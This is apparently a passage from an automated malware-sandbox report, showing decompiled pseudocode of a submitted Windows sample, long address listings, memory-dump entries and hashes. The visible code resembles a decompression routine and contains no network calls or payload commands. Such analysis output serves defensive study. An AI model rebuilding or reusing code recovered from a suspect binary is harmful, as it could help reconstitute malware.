                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                            													__eflags = __eax;
                                                                                            												}
                                                                                            												__edx =  *(__ebp - 8);
                                                                                            												__cl =  *(__eax + __edx);
                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                            												 *(__eax + __edx) = __cl;
                                                                                            												__eax = __eax + 1;
                                                                                            												__edx = 0;
                                                                                            												_t414 = __eax %  *(__ebp - 0x74);
                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                            												__edx = _t414;
                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                            												__eflags =  *(__ebp - 0x30);
                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                            												 *(__ebp - 0x14) = _t414;
                                                                                            												if( *(__ebp - 0x30) > 0) {
                                                                                            													continue;
                                                                                            												} else {
                                                                                            													L127:
                                                                                            													L81:
                                                                                            													 *(__ebp - 0x88) = 2;
                                                                                            													goto L1;
                                                                                            												}
                                                                                            											}
                                                                                            											L167:
                                                                                            											 *(__ebp - 0x88) = 0x1c;
                                                                                            											goto L170;
                                                                                            									}
                                                                                            								}
                                                                                            								L171:
                                                                                            								_t539 = _t538 | 0xffffffff;
                                                                                            								goto L172;
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            			}















                                                                                            0x00406481
                                                                                            0x00406481
                                                                                            0x00406481
                                                                                            0x00406481
                                                                                            0x00406487
                                                                                            0x0040648b
                                                                                            0x0040648f
                                                                                            0x00406499
                                                                                            0x004064a7
                                                                                            0x0040677d
                                                                                            0x0040677d
                                                                                            0x00406780
                                                                                            0x00406787
                                                                                            0x004067b4
                                                                                            0x004067b4
                                                                                            0x004067b8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004067ba
                                                                                            0x004067c3
                                                                                            0x004067c9
                                                                                            0x004067cc
                                                                                            0x004067cf
                                                                                            0x004067d2
                                                                                            0x004067d5
                                                                                            0x004067db
                                                                                            0x004067f4
                                                                                            0x004067f7
                                                                                            0x00406803
                                                                                            0x00406804
                                                                                            0x00406807
                                                                                            0x004067dd
                                                                                            0x004067dd
                                                                                            0x004067ec
                                                                                            0x004067ef
                                                                                            0x004067ef
                                                                                            0x00406811
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b1
                                                                                            0x004067b4
                                                                                            0x004067b8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406813
                                                                                            0x00406813
                                                                                            0x0040678c
                                                                                            0x00406790
                                                                                            0x004068c8
                                                                                            0x004068c8
                                                                                            0x004068d2
                                                                                            0x004068da
                                                                                            0x004068e1
                                                                                            0x004068e3
                                                                                            0x004068ea
                                                                                            0x004068ee
                                                                                            0x004068ee
                                                                                            0x00406796
                                                                                            0x0040679c
                                                                                            0x004067a3
                                                                                            0x004067ab
                                                                                            0x004067ab
                                                                                            0x004067ae
                                                                                            0x00000000
                                                                                            0x004067ae
                                                                                            0x00406818
                                                                                            0x00406825
                                                                                            0x00406828
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00405ed0
                                                                                            0x00405ed0
                                                                                            0x00405ed0
                                                                                            0x00405ed9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf
                                                                                            0x00405edf
                                                                                            0x00000000
                                                                                            0x00405ee6
                                                                                            0x00405eea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ef0
                                                                                            0x00405ef3
                                                                                            0x00405ef6
                                                                                            0x00405ef9
                                                                                            0x00405efd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f03
                                                                                            0x00405f03
                                                                                            0x00405f06
                                                                                            0x00405f08
                                                                                            0x00405f09
                                                                                            0x00405f0c
                                                                                            0x00405f0e
                                                                                            0x00405f0f
                                                                                            0x00405f11
                                                                                            0x00405f14
                                                                                            0x00405f19
                                                                                            0x00405f1e
                                                                                            0x00405f27
                                                                                            0x00405f3a
                                                                                            0x00405f3d
                                                                                            0x00405f49
                                                                                            0x00405f71
                                                                                            0x00405f73
                                                                                            0x00405f81
                                                                                            0x00405f81
                                                                                            0x00405f85
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f75
                                                                                            0x00405f78
                                                                                            0x00405f79
                                                                                            0x00405f79
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f4b
                                                                                            0x00405f4f
                                                                                            0x00405f54
                                                                                            0x00405f54
                                                                                            0x00405f5d
                                                                                            0x00405f65
                                                                                            0x00405f68
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f8b
                                                                                            0x00405f8b
                                                                                            0x00405f8f
                                                                                            0x0040683b
                                                                                            0x0040683b
                                                                                            0x00000000
                                                                                            0x0040683b
                                                                                            0x00405f95
                                                                                            0x00405f98
                                                                                            0x00405fa8
                                                                                            0x00405fab
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fb1
                                                                                            0x00405fb5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405fb7
                                                                                            0x00405fb7
                                                                                            0x00405fbd
                                                                                            0x00405fe7
                                                                                            0x00405fed
                                                                                            0x00405ff4
                                                                                            0x00000000
                                                                                            0x00405ff4
                                                                                            0x00405fbf
                                                                                            0x00405fc3
                                                                                            0x00405fc6
                                                                                            0x00405fcb
                                                                                            0x00405fcb
                                                                                            0x00405fd6
                                                                                            0x00405fde
                                                                                            0x00405fe1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406026
                                                                                            0x0040602c
                                                                                            0x0040602f
                                                                                            0x0040603c
                                                                                            0x00406044
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ffb
                                                                                            0x00405ffb
                                                                                            0x00405fff
                                                                                            0x0040684a
                                                                                            0x0040684a
                                                                                            0x00000000
                                                                                            0x0040684a
                                                                                            0x00406005
                                                                                            0x0040600b
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406019
                                                                                            0x0040601c
                                                                                            0x0040601f
                                                                                            0x00406024
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004066bb
                                                                                            0x004066bb
                                                                                            0x004066c1
                                                                                            0x004066c7
                                                                                            0x004066cd
                                                                                            0x004066e7
                                                                                            0x004066ea
                                                                                            0x004066f0
                                                                                            0x004066fb
                                                                                            0x004066fb
                                                                                            0x004066fd
                                                                                            0x004066cf
                                                                                            0x004066cf
                                                                                            0x004066de
                                                                                            0x004066e2
                                                                                            0x004066e2
                                                                                            0x00406707
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406709
                                                                                            0x0040670d
                                                                                            0x004068bc
                                                                                            0x004068bc
                                                                                            0x00000000
                                                                                            0x004068bc
                                                                                            0x00406713
                                                                                            0x00406719
                                                                                            0x00406720
                                                                                            0x00406728
                                                                                            0x0040672b
                                                                                            0x0040672e
                                                                                            0x0040672e
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040604c
                                                                                            0x0040604c
                                                                                            0x0040604e
                                                                                            0x00406051
                                                                                            0x004060c2
                                                                                            0x004060c2
                                                                                            0x004060c5
                                                                                            0x004060c8
                                                                                            0x004060cf
                                                                                            0x004060d9
                                                                                            0x00000000
                                                                                            0x004060d9
                                                                                            0x00406053
                                                                                            0x00406053
                                                                                            0x00406057
                                                                                            0x0040605a
                                                                                            0x0040605c
                                                                                            0x0040605f
                                                                                            0x00406062
                                                                                            0x00406064
                                                                                            0x00406067
                                                                                            0x00406069
                                                                                            0x0040606e
                                                                                            0x00406071
                                                                                            0x00406074
                                                                                            0x00406078
                                                                                            0x0040607f
                                                                                            0x00406082
                                                                                            0x00406089
                                                                                            0x0040608d
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406099
                                                                                            0x0040609c
                                                                                            0x004060ba
                                                                                            0x004060ba
                                                                                            0x004060bc
                                                                                            0x00000000
                                                                                            0x0040609e
                                                                                            0x0040609e
                                                                                            0x0040609e
                                                                                            0x004060a1
                                                                                            0x004060a4
                                                                                            0x004060a7
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060ac
                                                                                            0x004060af
                                                                                            0x004060b1
                                                                                            0x004060b2
                                                                                            0x004060b5
                                                                                            0x00000000
                                                                                            0x004060b5
                                                                                            0x00000000
                                                                                            0x004062eb
                                                                                            0x004062eb
                                                                                            0x004062ef
                                                                                            0x0040630d
                                                                                            0x0040630d
                                                                                            0x00406310
                                                                                            0x00406317
                                                                                            0x0040631a
                                                                                            0x0040631d
                                                                                            0x00406320
                                                                                            0x00406323
                                                                                            0x00406326
                                                                                            0x00406328
                                                                                            0x0040632f
                                                                                            0x00406330
                                                                                            0x00406332
                                                                                            0x00406335
                                                                                            0x00406338
                                                                                            0x0040633b
                                                                                            0x0040633b
                                                                                            0x00406340
                                                                                            0x00000000
                                                                                            0x00406340
                                                                                            0x004062f1
                                                                                            0x004062f1
                                                                                            0x004062f4
                                                                                            0x004062f7
                                                                                            0x00406301
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406355
                                                                                            0x00406355
                                                                                            0x00406359
                                                                                            0x0040637c
                                                                                            0x0040637f
                                                                                            0x00406382
                                                                                            0x0040638c
                                                                                            0x0040635b
                                                                                            0x0040635b
                                                                                            0x0040635e
                                                                                            0x00406361
                                                                                            0x00406364
                                                                                            0x00406371
                                                                                            0x00406374
                                                                                            0x00406374
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406398
                                                                                            0x00406398
                                                                                            0x0040639c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063a2
                                                                                            0x004063a2
                                                                                            0x004063a6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063ac
                                                                                            0x004063ac
                                                                                            0x004063ae
                                                                                            0x004063b2
                                                                                            0x004063b2
                                                                                            0x004063b5
                                                                                            0x004063b9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406409
                                                                                            0x00406409
                                                                                            0x0040640d
                                                                                            0x00406414
                                                                                            0x00406414
                                                                                            0x00406417
                                                                                            0x0040641a
                                                                                            0x00406424
                                                                                            0x00000000
                                                                                            0x00406424
                                                                                            0x0040640f
                                                                                            0x0040640f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406430
                                                                                            0x00406430
                                                                                            0x00406434
                                                                                            0x0040643b
                                                                                            0x0040643e
                                                                                            0x00406441
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406436
                                                                                            0x00406444
                                                                                            0x00406447
                                                                                            0x0040644a
                                                                                            0x0040644a
                                                                                            0x0040644d
                                                                                            0x00406450
                                                                                            0x00406453
                                                                                            0x00406453
                                                                                            0x00406456
                                                                                            0x0040645d
                                                                                            0x00406462
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004064f0
                                                                                            0x004064f0
                                                                                            0x004064f4
                                                                                            0x00406892
                                                                                            0x00406892
                                                                                            0x00000000
                                                                                            0x00406892
                                                                                            0x004064fa
                                                                                            0x004064fa
                                                                                            0x004064fd
                                                                                            0x00406500
                                                                                            0x00406504
                                                                                            0x00406507
                                                                                            0x0040650d
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x0040650f
                                                                                            0x00406512
                                                                                            0x00406515
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004060e5
                                                                                            0x004060e5
                                                                                            0x004060e9
                                                                                            0x00406856
                                                                                            0x00406856
                                                                                            0x00000000
                                                                                            0x00406856
                                                                                            0x004060ef
                                                                                            0x004060ef
                                                                                            0x004060f2
                                                                                            0x004060f5
                                                                                            0x004060f9
                                                                                            0x004060fc
                                                                                            0x00406102
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406104
                                                                                            0x00406107
                                                                                            0x0040610a
                                                                                            0x0040610a
                                                                                            0x0040610d
                                                                                            0x00406110
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406116
                                                                                            0x00406116
                                                                                            0x0040611c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406122
                                                                                            0x00406122
                                                                                            0x00406126
                                                                                            0x00406129
                                                                                            0x0040612c
                                                                                            0x0040612f
                                                                                            0x00406132
                                                                                            0x00406133
                                                                                            0x00406136
                                                                                            0x00406138
                                                                                            0x0040613e
                                                                                            0x00406141
                                                                                            0x00406144
                                                                                            0x00406147
                                                                                            0x0040614a
                                                                                            0x0040614d
                                                                                            0x00406150
                                                                                            0x0040616c
                                                                                            0x0040616f
                                                                                            0x00406172
                                                                                            0x00406175
                                                                                            0x0040617c
                                                                                            0x00406180
                                                                                            0x00406182
                                                                                            0x00406186
                                                                                            0x00406152
                                                                                            0x00406152
                                                                                            0x00406156
                                                                                            0x0040615e
                                                                                            0x00406163
                                                                                            0x00406165
                                                                                            0x00406167
                                                                                            0x00406167
                                                                                            0x00406189
                                                                                            0x00406190
                                                                                            0x00406193
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x00406199
                                                                                            0x00000000
                                                                                            0x00406199
                                                                                            0x00000000
                                                                                            0x0040619e
                                                                                            0x0040619e
                                                                                            0x004061a2
                                                                                            0x00406862
                                                                                            0x00406862
                                                                                            0x00000000
                                                                                            0x00406862
                                                                                            0x004061a8
                                                                                            0x004061a8
                                                                                            0x004061ab
                                                                                            0x004061ae
                                                                                            0x004061b2
                                                                                            0x004061b5
                                                                                            0x004061bb
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061bd
                                                                                            0x004061c0
                                                                                            0x004061c3
                                                                                            0x004061c3
                                                                                            0x004061c3
                                                                                            0x004061c9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004061cb
                                                                                            0x004061cb
                                                                                            0x004061ce
                                                                                            0x004061d1
                                                                                            0x004061d4
                                                                                            0x004061d7
                                                                                            0x004061da
                                                                                            0x004061dd
                                                                                            0x004061e0
                                                                                            0x004061e3
                                                                                            0x004061e6
                                                                                            0x004061e9
                                                                                            0x00406201
                                                                                            0x00406204
                                                                                            0x00406207
                                                                                            0x0040620a
                                                                                            0x0040620a
                                                                                            0x0040620d
                                                                                            0x00406211
                                                                                            0x00406213
                                                                                            0x004061eb
                                                                                            0x004061eb
                                                                                            0x004061f3
                                                                                            0x004061f8
                                                                                            0x004061fa
                                                                                            0x004061fc
                                                                                            0x004061fc
                                                                                            0x00406216
                                                                                            0x0040621d
                                                                                            0x00406220
                                                                                            0x00000000
                                                                                            0x00406222
                                                                                            0x00406222
                                                                                            0x00000000
                                                                                            0x00406222
                                                                                            0x00406220
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00406227
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406262
                                                                                            0x00406262
                                                                                            0x00406266
                                                                                            0x0040686e
                                                                                            0x0040686e
                                                                                            0x00000000
                                                                                            0x0040686e
                                                                                            0x0040626c
                                                                                            0x0040626c
                                                                                            0x0040626f
                                                                                            0x00406272
                                                                                            0x00406276
                                                                                            0x00406279
                                                                                            0x0040627f
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406281
                                                                                            0x00406284
                                                                                            0x00406287
                                                                                            0x00406287
                                                                                            0x0040628d
                                                                                            0x0040622b
                                                                                            0x0040622b
                                                                                            0x0040622e
                                                                                            0x00000000
                                                                                            0x0040622e
                                                                                            0x0040628f
                                                                                            0x0040628f
                                                                                            0x00406292
                                                                                            0x00406295
                                                                                            0x00406298
                                                                                            0x0040629b
                                                                                            0x0040629e
                                                                                            0x004062a1
                                                                                            0x004062a4
                                                                                            0x004062a7
                                                                                            0x004062aa
                                                                                            0x004062ad
                                                                                            0x004062c5
                                                                                            0x004062c8
                                                                                            0x004062cb
                                                                                            0x004062ce
                                                                                            0x004062ce
                                                                                            0x004062d1
                                                                                            0x004062d5
                                                                                            0x004062d7
                                                                                            0x004062af
                                                                                            0x004062af
                                                                                            0x004062b7
                                                                                            0x004062bc
                                                                                            0x004062be
                                                                                            0x004062c0
                                                                                            0x004062c0
                                                                                            0x004062da
                                                                                            0x004062e1
                                                                                            0x004062e4
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x004062e6
                                                                                            0x00000000
                                                                                            0x00406573
                                                                                            0x00406573
                                                                                            0x00406577
                                                                                            0x0040689e
                                                                                            0x0040689e
                                                                                            0x00000000
                                                                                            0x0040689e
                                                                                            0x0040657d
                                                                                            0x0040657d
                                                                                            0x00406580
                                                                                            0x00406583
                                                                                            0x00406587
                                                                                            0x0040658a
                                                                                            0x00406590
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406592
                                                                                            0x00406595
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406343
                                                                                            0x00406343
                                                                                            0x00406346
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406682
                                                                                            0x00406682
                                                                                            0x00406686
                                                                                            0x004066a8
                                                                                            0x004066a8
                                                                                            0x004066ab
                                                                                            0x004066b5
                                                                                            0x004066b8
                                                                                            0x004066b8
                                                                                            0x00000000
                                                                                            0x004066b8
                                                                                            0x00406688
                                                                                            0x00406688
                                                                                            0x0040668b
                                                                                            0x0040668f
                                                                                            0x00406692
                                                                                            0x00406692
                                                                                            0x00406695
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040673f
                                                                                            0x0040673f
                                                                                            0x00406743
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406761
                                                                                            0x00406768
                                                                                            0x0040676f
                                                                                            0x00406776
                                                                                            0x00406776
                                                                                            0x0040677d
                                                                                            0x00406780
                                                                                            0x00406787
                                                                                            0x00000000
                                                                                            0x0040678a
                                                                                            0x00406745
                                                                                            0x00406745
                                                                                            0x00406748
                                                                                            0x0040674b
                                                                                            0x0040674e
                                                                                            0x00406755
                                                                                            0x00406699
                                                                                            0x00406699
                                                                                            0x0040669c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406830
                                                                                            0x00406830
                                                                                            0x00406833
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00406734
                                                                                            0x00000000
                                                                                            0x0040673a
                                                                                            0x00000000
                                                                                            0x0040646a
                                                                                            0x0040646a
                                                                                            0x0040646c
                                                                                            0x00406473
                                                                                            0x00406474
                                                                                            0x00406476
                                                                                            0x00406479
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040677d
                                                                                            0x0040677d
                                                                                            0x00406780
                                                                                            0x00406787
                                                                                            0x00000000
                                                                                            0x0040678a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004064af
                                                                                            0x004064af
                                                                                            0x004064b2
                                                                                            0x004064e8
                                                                                            0x004064e8
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x00406618
                                                                                            0x0040661b
                                                                                            0x0040661b
                                                                                            0x0040661e
                                                                                            0x00406620
                                                                                            0x004068aa
                                                                                            0x004068aa
                                                                                            0x00000000
                                                                                            0x004068aa
                                                                                            0x00406626
                                                                                            0x00406626
                                                                                            0x00406629
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040662f
                                                                                            0x0040662f
                                                                                            0x00406633
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00406636
                                                                                            0x00000000
                                                                                            0x00406636
                                                                                            0x004064b4
                                                                                            0x004064b4
                                                                                            0x004064b6
                                                                                            0x004064b8
                                                                                            0x004064ba
                                                                                            0x004064bd
                                                                                            0x004064be
                                                                                            0x004064c0
                                                                                            0x004064c2
                                                                                            0x004064c5
                                                                                            0x004064c8
                                                                                            0x004064de
                                                                                            0x004064de
                                                                                            0x004064e3
                                                                                            0x0040651b
                                                                                            0x0040651b
                                                                                            0x0040651f
                                                                                            0x00406548
                                                                                            0x0040654b
                                                                                            0x0040654d
                                                                                            0x00406554
                                                                                            0x00406557
                                                                                            0x0040655a
                                                                                            0x0040655a
                                                                                            0x0040655f
                                                                                            0x0040655f
                                                                                            0x00406561
                                                                                            0x00406564
                                                                                            0x0040656b
                                                                                            0x0040656e
                                                                                            0x0040659b
                                                                                            0x0040659b
                                                                                            0x0040659e
                                                                                            0x004065a1
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00406615
                                                                                            0x00000000
                                                                                            0x00406615
                                                                                            0x004065a3
                                                                                            0x004065a3
                                                                                            0x004065a9
                                                                                            0x004065ac
                                                                                            0x004065af
                                                                                            0x004065b2
                                                                                            0x004065b5
                                                                                            0x004065b8
                                                                                            0x004065bb
                                                                                            0x004065be
                                                                                            0x004065c1
                                                                                            0x004065c4
                                                                                            0x004065dd
                                                                                            0x004065df
                                                                                            0x004065e2
                                                                                            0x004065e3
                                                                                            0x004065e6
                                                                                            0x004065e8
                                                                                            0x004065eb
                                                                                            0x004065ed
                                                                                            0x004065ef
                                                                                            0x004065f2
                                                                                            0x004065f4
                                                                                            0x004065f7
                                                                                            0x004065fb
                                                                                            0x004065fd
                                                                                            0x004065fd
                                                                                            0x004065fe
                                                                                            0x00406601
                                                                                            0x00406604
                                                                                            0x004065c6
                                                                                            0x004065c6
                                                                                            0x004065ce
                                                                                            0x004065d3
                                                                                            0x004065d5
                                                                                            0x004065d8
                                                                                            0x004065d8
                                                                                            0x00406607
                                                                                            0x0040660e
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00406598
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x00406610
                                                                                            0x00000000
                                                                                            0x00406610
                                                                                            0x0040660e
                                                                                            0x00406521
                                                                                            0x00406521
                                                                                            0x00406524
                                                                                            0x00406526
                                                                                            0x00406529
                                                                                            0x0040652c
                                                                                            0x0040652f
                                                                                            0x00406531
                                                                                            0x00406534
                                                                                            0x00406537
                                                                                            0x00406537
                                                                                            0x0040653a
                                                                                            0x0040653a
                                                                                            0x0040653d
                                                                                            0x00406544
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00406518
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00406546
                                                                                            0x00000000
                                                                                            0x00406546
                                                                                            0x00406544
                                                                                            0x004064ca
                                                                                            0x004064ca
                                                                                            0x004064cd
                                                                                            0x004064cf
                                                                                            0x004064d2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406231
                                                                                            0x00406231
                                                                                            0x00406235
                                                                                            0x0040687a
                                                                                            0x0040687a
                                                                                            0x00000000
                                                                                            0x0040687a
                                                                                            0x0040623b
                                                                                            0x0040623b
                                                                                            0x0040623e
                                                                                            0x00406241
                                                                                            0x00406244
                                                                                            0x00406247
                                                                                            0x0040624a
                                                                                            0x0040624d
                                                                                            0x0040624f
                                                                                            0x00406252
                                                                                            0x00406255
                                                                                            0x00406258
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x0040625a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004063bc
                                                                                            0x004063bc
                                                                                            0x004063c0
                                                                                            0x00406886
                                                                                            0x00406886
                                                                                            0x00000000
                                                                                            0x00406886
                                                                                            0x004063c6
                                                                                            0x004063c6
                                                                                            0x004063c9
                                                                                            0x004063cc
                                                                                            0x004063cf
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d1
                                                                                            0x004063d4
                                                                                            0x004063d7
                                                                                            0x004063da
                                                                                            0x004063dd
                                                                                            0x004063e0
                                                                                            0x004063e3
                                                                                            0x004063e4
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e6
                                                                                            0x004063e9
                                                                                            0x004063ec
                                                                                            0x004063ef
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f2
                                                                                            0x004063f5
                                                                                            0x004063f7
                                                                                            0x004063f7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x00406639
                                                                                            0x0040663d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406643
                                                                                            0x00406643
                                                                                            0x00406646
                                                                                            0x00406649
                                                                                            0x0040664c
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x0040664e
                                                                                            0x00406651
                                                                                            0x00406654
                                                                                            0x00406657
                                                                                            0x0040665a
                                                                                            0x0040665d
                                                                                            0x00406660
                                                                                            0x00406661
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406663
                                                                                            0x00406666
                                                                                            0x00406669
                                                                                            0x0040666c
                                                                                            0x0040666f
                                                                                            0x00406672
                                                                                            0x00406676
                                                                                            0x00406678
                                                                                            0x0040667b
                                                                                            0x00000000
                                                                                            0x0040667d
                                                                                            0x0040667d
                                                                                            0x004063fa
                                                                                            0x004063fa
                                                                                            0x00000000
                                                                                            0x004063fa
                                                                                            0x0040667b
                                                                                            0x004068b0
                                                                                            0x004068b0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf
                                                                                            0x004068e7
                                                                                            0x004068e7
                                                                                            0x00000000
                                                                                            0x004068e7
                                                                                            0x00406734
                                                                                            0x004067b4
                                                                                            0x0040677d

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                                                                                            • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                                                                                            • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                                                                                            • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 98%
                                                                                            			E00406682() {
                                                                                            				void _t533;
                                                                                            				signed int _t534;
                                                                                            				signed int _t535;
                                                                                            				signed int* _t605;
                                                                                            				void* _t612;
                                                                                            
                                                                                            				L0:
                                                                                            				while(1) {
                                                                                            					L0:
                                                                                            					if( *(_t612 - 0x40) != 0) {
                                                                                            						 *(_t612 - 0x84) = 0x13;
                                                                                            						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                            						goto L132;
                                                                                            					} else {
                                                                                            						__eax =  *(__ebp - 0x4c);
                                                                                            						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                            						__ecx =  *(__ebp - 0x58);
                                                                                            						__eax =  *(__ebp - 0x4c) << 4;
                                                                                            						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                            						L130:
                                                                                            						 *(__ebp - 0x58) = __eax;
                                                                                            						 *(__ebp - 0x40) = 3;
                                                                                            						L144:
                                                                                            						 *(__ebp - 0x7c) = 0x14;
                                                                                            						L145:
                                                                                            						__eax =  *(__ebp - 0x40);
                                                                                            						 *(__ebp - 0x50) = 1;
                                                                                            						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                            						L149:
                                                                                            						if( *(__ebp - 0x48) <= 0) {
                                                                                            							__ecx =  *(__ebp - 0x40);
                                                                                            							__ebx =  *(__ebp - 0x50);
                                                                                            							0 = 1;
                                                                                            							__eax = 1 << __cl;
                                                                                            							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                            							__eax =  *(__ebp - 0x7c);
                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                            							while(1) {
                                                                                            								L140:
                                                                                            								 *(_t612 - 0x88) = _t533;
